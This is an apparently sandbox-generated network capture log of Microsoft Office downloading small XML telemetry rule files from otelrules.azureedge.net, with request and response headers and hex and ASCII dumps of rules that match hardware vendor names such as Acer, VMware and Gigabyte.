                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:04 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 486
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 4e7b5ce8-701e-0098-117a-3b395f000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111004Z-178bfbc474btrnf9hC1NYCb80g00000001dg00000000f6fr
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:04 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            15192.168.2.44975013.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:04 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:04 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: bdf962e5-c01e-0066-1b8c-3aa1ec000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111004Z-1777c6cb754rz2pghC1TEBghen0000000au000000000dp3q
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:04 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            16192.168.2.44975213.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:04 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:04 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 407
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: b82db720-b01e-0053-528c-3acdf8000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111004Z-r1d97b99577sdxndhC1TEBec5n0000000af00000000039q4
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:05 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            17192.168.2.44975113.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:04 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:04 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 486
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: a1d80e42-301e-0096-338c-3ae71d000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111004Z-178bfbc474bp8mkvhC1NYCzqnn0000000160000000009pwu
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:05 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            18192.168.2.44975413.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:06 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:06 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 9bf3f441-f01e-003f-246b-3bd19d000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111006Z-178bfbc474bw8bwphC1NYC38b400000001900000000036aa
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:07 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            19192.168.2.44975313.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:06 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:07 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:06 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 469
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BBA701121"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 63e0f5a8-701e-0032-207a-3ba540000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111006Z-178bfbc474bw8bwphC1NYC38b40000000180000000005qzm
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:07 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            20192.168.2.44975513.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:06 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:07 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 477
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 3c827ba2-d01e-0014-367c-3bed58000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111007Z-178bfbc474bwh9gmhC1NYCy3rs00000001bg00000000e6u9
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:07 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            21192.168.2.44975613.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:06 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:07 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 464
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 918e3103-701e-0097-4a7c-3bb8c1000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111007Z-1777c6cb754gvvgfhC1TEBz4rg0000000b30000000006g5e
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:07 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            22192.168.2.44975713.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:06 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:07 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 494
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: e7bb18f6-501e-000a-54a9-3b0180000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111007Z-1777c6cb7544n7p6hC1TEByvb40000000b6g000000003eyp
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:07 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
